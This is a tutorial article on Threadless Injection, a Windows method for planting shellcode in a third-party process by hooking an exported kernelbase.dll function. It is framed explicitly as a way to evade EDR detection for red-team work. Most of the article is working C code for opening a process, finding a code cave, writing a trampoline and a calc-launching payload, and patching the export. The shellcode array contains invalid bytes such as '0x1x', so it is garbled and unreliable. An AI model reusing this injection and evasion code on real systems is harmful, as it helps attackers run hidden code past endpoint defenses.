Threadless Injection. Injecting shellcode into third-party processes to circumvent EDR

Date: 07/05/2025

This article discusses Threadless Injection, a technique for injecting code into third-party processes without creating a remote thread. At the time of writing, it worked on Windows 11 23H2 x64 running in a virtual machine isolated from the network, with OS security features enabled.

info

Also see my previous article describing the Process Ghosting injection technique.

The standard shellcode injection procedure and subsequent shellcode execution involve the following steps:

  1. Get a process handle (OpenProcess or NtOpenProcess);
  2. Allocate memory for payload (VirtualAllocEx or NtMapViewOfSection);
  3. Write payload to the allocated memory (WriteProcessMemory or Ghost Writing); and
  4. Execute shellcode (CreateRemoteThread or NtQueueApcThread).

Needless to say, this sequence of actions is well known to EDR tools: if a program implements it, a red flag is raised immediately and the process is terminated.

Is it possible to write code that performs the same actions but doesn't directly use the above-listed WinAPI functions? For the first three steps, such a task is feasible, but when it comes to shellcode execution, problems arise. If a program directly calls CreateRemoteThread or NtQueueApcThread against another process, an EDR is almost certain to raise an alert.

So, to fool the defense, this chain of actions has to be broken somehow. For example, you can try to intercept some API calls in a third-party app, in an exported DLL function, and then make this function work for you…

warning

This article is intended for security specialists operating under a contract; all information provided in it is for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication. Distribution of malware, disruption of systems, and violation of secrecy of correspondence are prosecuted by law.

The idea is as follows: you patch network functions of some legitimate software that already interacts with the network and then use these functions to communicate with your network resources. This is the essence of the Threadless Injection technique: you patch exported functions of a dynamic library used by a third-party process so that your code is executed when these functions are called. Its implementation involves the following steps:

  1. Find a code cave that can accommodate your shellcode and trampoline;
  2. Write the shellcode and trampoline to this memory area;
  3. Patch an exported DLL function to make it execute your code; and 
  4. Wait for this function to be called, which will trigger shellcode execution.

But a dynamic library can contain hundreds or even thousands of functions, and a randomly selected function might be unsuitable for your purposes. Who can guarantee that it will be called within a reasonable period of time (or called at all)?

To solve this issue, you have to examine the software you are going to use to intercept an exported function. Ideally, you need an app that calls certain DLL functions on a regular basis (e.g. when it accesses its temporary file on the disk and writes intermediate results to it or checks the availability of its servers on the network by calling the respective API at a certain interval). If you find such a function, you can be sure that the required call will occur before long.

On the other hand, this rule shouldn't be abused: if an app calls some API too often (e.g. several times per second, possibly from several threads) and you try to intercept such a call, the target is likely to glitch or crash.

To conduct this research, let's use API Monitor. This program shows in real time how a WinAPI function is called and which actions in the test program trigger the call. In addition, you can see which DLLs are loaded into the process and which APIs they implement (i.e. you see not just a list of WinAPIs whose origin is unknown). Based on the monitoring data, you can decide which function from the library export is suitable for your purposes and should be intercepted.

API Monitor

Once you examine the test program and identify the required WinAPIs, you can start coding.

Coding

Let’s implement each step required to perform Threadless Injection in code.

First, you have to get a handle of the target process by its name:

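#include <windows.h>
#include <tlhelp32.h>

// Returns a handle to the first process whose image name matches ps_name
// (NULL if none could be opened) and stores its PID in *procID
HANDLE open_process_by_name(LPCWSTR ps_name, DWORD *procID)
{
    HANDLE hProc = NULL;
    PROCESSENTRY32W pe32;
    pe32.dwSize = sizeof(PROCESSENTRY32W);
    HANDLE process_snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    // On failure, the snapshot function returns INVALID_HANDLE_VALUE, not NULL
    if (process_snap == INVALID_HANDLE_VALUE) return NULL;
    if (Process32FirstW(process_snap, &pe32)) {
        do {
            if (_wcsicmp(pe32.szExeFile, ps_name) == 0) {
                hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
                if (!hProc) continue;
                *procID = pe32.th32ProcessID;
                break;
            }
        } while (Process32NextW(process_snap, &pe32));
    }
    CloseHandle(process_snap);
    return hProc;
}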

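Then you load the selected dynamic library whose export contains the API function required for your purposes (e.g. kernelbase.dll) into your own process. System DLLs are normally mapped at the same base address in every process until the next reboot, so an address resolved locally is also valid in the target: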

HMODULE hModule = GetModuleHandleW(L"kernelbase.dll");
if (hModule == NULL)
    hModule = LoadLibraryW(L"kernelbase.dll");

Next, you get the address of your API in the DLL:

// victim_export_func is the name (a narrow char string) of the function
// from the kernelbase.dll export that will be hooked
void* dll_export_fun_addr = (void*)GetProcAddress(hModule, victim_export_func);
if (dll_export_fun_addr == NULL) return 1;

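Searching for a code cave (i.e. memory area where you can write your data). The hook is a 5-byte relative call, so the cave must lie within about 2 GB of the hooked function; this is why the search window is centered on its address. The returned address is what the later snippets call remoteAddress:

// function_addr is the address of the exported function to be hooked;
// size is the combined size of the trampoline and the shellcode
UINT_PTR find_code_cave(HANDLE hProc, UINT_PTR function_addr, SIZE_T size)
{
    UINT_PTR addr_of_codecave;
    // Start search
    for (addr_of_codecave = (function_addr & 0xFFFFFFFFFFF70000) - 0x70000000;
         // Address range
         addr_of_codecave < function_addr + 0x70000000;
         // Memory browsing increment
         addr_of_codecave += 0x10000)
    {
        LPVOID lpAddr = VirtualAllocEx(hProc,
            (LPVOID)addr_of_codecave,
            size,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);
        // This address is occupied: try the next one
        if (lpAddr == NULL) continue;
        return (UINT_PTR)lpAddr;
    }
    // Nothing suitable found in the window
    return 0;
}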
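The bounds of this search window can be checked in isolation. The sketch below is only an illustration in portable C: the helper names search_start and search_end are hypothetical, and the constants are copied from the loop above. It shows that both ends of the window stay closer than 2 GiB to the function, which is the limit of a 32-bit relative call.

```c
#include <assert.h>
#include <stdint.h>

/* Constants taken from the search loop in the article. */
#define SEARCH_RADIUS 0x70000000ULL
#define SEARCH_MASK   0xFFFFFFFFFFF70000ULL

/* Hypothetical helper: first address probed for a given function address. */
static uint64_t search_start(uint64_t function_addr)
{
    return (function_addr & SEARCH_MASK) - SEARCH_RADIUS;
}

/* Hypothetical helper: exclusive upper bound of the probed range. */
static uint64_t search_end(uint64_t function_addr)
{
    return function_addr + SEARCH_RADIUS;
}
```

The mask clears the low 16 bits, so every probed address is a multiple of 0x10000, which matches the loop increment.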

The next step involves the trampoline and some address arithmetic. To make it clear, let's define the trampoline and the payload first. I am going to use a standard payload frequently used in PoC demos that starts Calculator. The trampoline writes the original bytes back to the hooked function, saves the registers, calls the payload, restores the registers, and jumps back to the function:

unsigned char tramp_to_shellcode[] = {
0x58, 0x48, 0x83, 0xE8, 0x05, 0x50,
0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
0x41, 0x52, 0x41, 0x53, 0x48, 0xB9,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x48, 0x89, 0x08, 0x48,
0x83, 0xEC, 0x40, 0xE8, 0x11, 0x00,
0x00, 0x00, 0x48, 0x83, 0xC4, 0x40,
0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59,
0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF,
0xE0, 0x90
};
unsigned char shellcode[] = {
0x53, 0x56, 0x57, 0x55, 0x54, 0x58,
0x66, 0x83, 0xE4, 0xF0, 0x50, 0x6A,
0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C,
0x63, 0x54, 0x59, 0x48, 0x29, 0xD4,
0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B,
0x76, 0x18, 0x48, 0x8B, 0x76, 0x10,
0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48,
0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C,
0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74,
0x1x, 0x20, 0x48, 0x01, 0xFE, 0x8B,
0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C,
0x1x, 0x8D, 0x52, 0x02, 0xAD, 0x81,
0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45,
0x7x, 0xEF, 0x8B, 0x74, 0x1F, 0x1C,
0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE,
0x4x, 0x01, 0xF7, 0x99, 0xFF, 0xD7,
0x48, 0x83, 0xC4, 0x68, 0x5C, 0x5D,
0x5x, 0x5E, 0x5B, 0xC3
};

Reading the beginning of the function exported from the DLL and configuring the trampoline using the obtained data:

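// The first 8 bytes of the function, read from the local copy of the DLL
int64_t originalBytes = *(int64_t*)dll_export_fun_addr;
// The trampoline isn't damaged: offset 0x12 is the zeroed 8-byte immediate
// operand of its mov rcx instruction, reserved for these bytes
*(uint64_t*)(tramp_to_shellcode + 0x12) = originalBytes;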
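Offset 0x12 is not 8-byte aligned, so the pointer cast above relies on x86 tolerating unaligned stores. A more defensive way to fill such a placeholder is memcpy with a bounds check. The following is a minimal sketch, not the author's code: patch_imm64 is a hypothetical helper, and the buffer in the usage note is a stand-in rather than the real trampoline.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: copies an 8-byte value into buf at the given offset.
   Returns 0 on success, -1 if the write would run past the buffer. */
static int patch_imm64(unsigned char *buf, size_t buf_len,
                       size_t offset, uint64_t value)
{
    if (offset > buf_len || buf_len - offset < sizeof(value))
        return -1;
    /* memcpy has no alignment requirement; byte order follows the host CPU */
    memcpy(buf + offset, &value, sizeof(value));
    return 0;
}
```

With the article's array, the call would be patch_imm64(tramp_to_shellcode, sizeof(tramp_to_shellcode), 0x12, (uint64_t)originalBytes).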

Configuring memory and granting it the PAGE_EXECUTE_READWRITE rights to set the hook:

DWORD saveProtectFlags = 0;
if (!VirtualProtectEx(hProc, dll_export_fun_addr, 8, PAGE_EXECUTE_READWRITE, &saveProtectFlags)) return 1;

Creating a hook (call) in the function exported by the attacked library and configuring it:

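// Call function opcode (E8 followed by a 32-bit relative displacement)
unsigned char call_opcode_to_shell[] = { 0xe8, 0, 0, 0, 0 };
// remoteAddress is the address of the code cave in the target process;
// the displacement is counted from the end of the 5-byte call instruction
int call_addr = (int)((UINT_PTR)remoteAddress - ((UINT_PTR)dll_export_fun_addr + 5));
// Configuring the call
*(int*)(call_opcode_to_shell + 1) = call_addr;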
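The displacement arithmetic is easy to get wrong, because it is measured from the address of the instruction that follows the call and must fit into a signed 32-bit value. Here is a small portable sketch of the same calculation with an explicit range check; encode_call_rel32 is a hypothetical helper name, not part of any library.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: builds "call rel32" (opcode 0xE8) for an instruction
   located at `from` that should transfer control to `to`.
   Returns 0 on success, -1 if the target is out of rel32 range. */
static int encode_call_rel32(uint64_t from, uint64_t to, unsigned char out[5])
{
    /* The displacement is relative to the end of the 5-byte instruction */
    int64_t delta = (int64_t)(to - (from + 5));
    if (delta < INT32_MIN || delta > INT32_MAX)
        return -1;
    int32_t rel = (int32_t)delta;
    out[0] = 0xE8;
    /* Host byte order, which is little-endian on x86-64 */
    memcpy(out + 1, &rel, sizeof(rel));
    return 0;
}
```

A cave below the function simply yields a negative displacement. A cave farther than about 2 GiB away is rejected instead of being silently truncated, which is what the plain int conversion would do.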

Writing the hook, then the trampoline and payload. The protection of the code cave is first set to PAGE_READWRITE for the write and then switched to PAGE_EXECUTE_READ when the job is done:

SIZE_T numOfWrittenBytes = 0;
DWORD oldProtect = 0;
// The protection must be changed on the exported function in the target,
// not on the local buffer, and the old-protection pointer must not be NULL
if (!VirtualProtectEx(hProc,
        dll_export_fun_addr,
        sizeof(call_opcode_to_shell),
        PAGE_EXECUTE_READWRITE,
        &oldProtect))
    return 1;
// Write the hook
if (!WriteProcessMemory(hProc,
        dll_export_fun_addr,
        call_opcode_to_shell,
        sizeof(call_opcode_to_shell),
        &numOfWrittenBytes))
    return 1;
unsigned char mypayload[sizeof(tramp_to_shellcode) + sizeof(shellcode)];
// In these two loops, one large payload is created: the trampoline first, the shellcode right after it.
for (size_t i = 0; i < sizeof(tramp_to_shellcode); ++i)
    mypayload[i] = tramp_to_shellcode[i];
for (size_t i = 0; i < sizeof(shellcode); ++i)
    mypayload[sizeof(tramp_to_shellcode) + i] = shellcode[i];
// Change memory access flags to enable writing
if (!VirtualProtectEx(hProc,
        (LPVOID)remoteAddress,
        sizeof(mypayload),
        PAGE_READWRITE,
        &saveProtectFlags))
    return 1;
// Write payload
if (!WriteProcessMemory(hProc,
        (LPVOID)remoteAddress,
        mypayload,
        sizeof(mypayload),
        &numOfWrittenBytes))
    return 1;
// Make the payload executable and no longer writable
if (!VirtualProtectEx(hProc,
        (LPVOID)remoteAddress,
        sizeof(mypayload),
        PAGE_EXECUTE_READ,
        &saveProtectFlags))
    return 1;

Congrats! Now all you have to do is wait for the app to call the patched function. You won’t have to wait for long since the modified API is called on a regular basis (as confirmed by API Monitor).

Conclusions

Now you are familiar with Threadless Injection, a technique that can be implemented without explicitly calling thread creation functions. This breaks the standard injection pattern, which makes detection less likely and lets you continue doing your job.

Of course, the above code is just a demonstration: a template that requires significant improvements to achieve true invisibility. This technique is neither a panacea nor a silver bullet that completely conceals your code. Remember: to give the Red Team a chance to win, all available techniques (injections, API calls, code obfuscation, etc.) should be used in deadly combinations. Good luck!
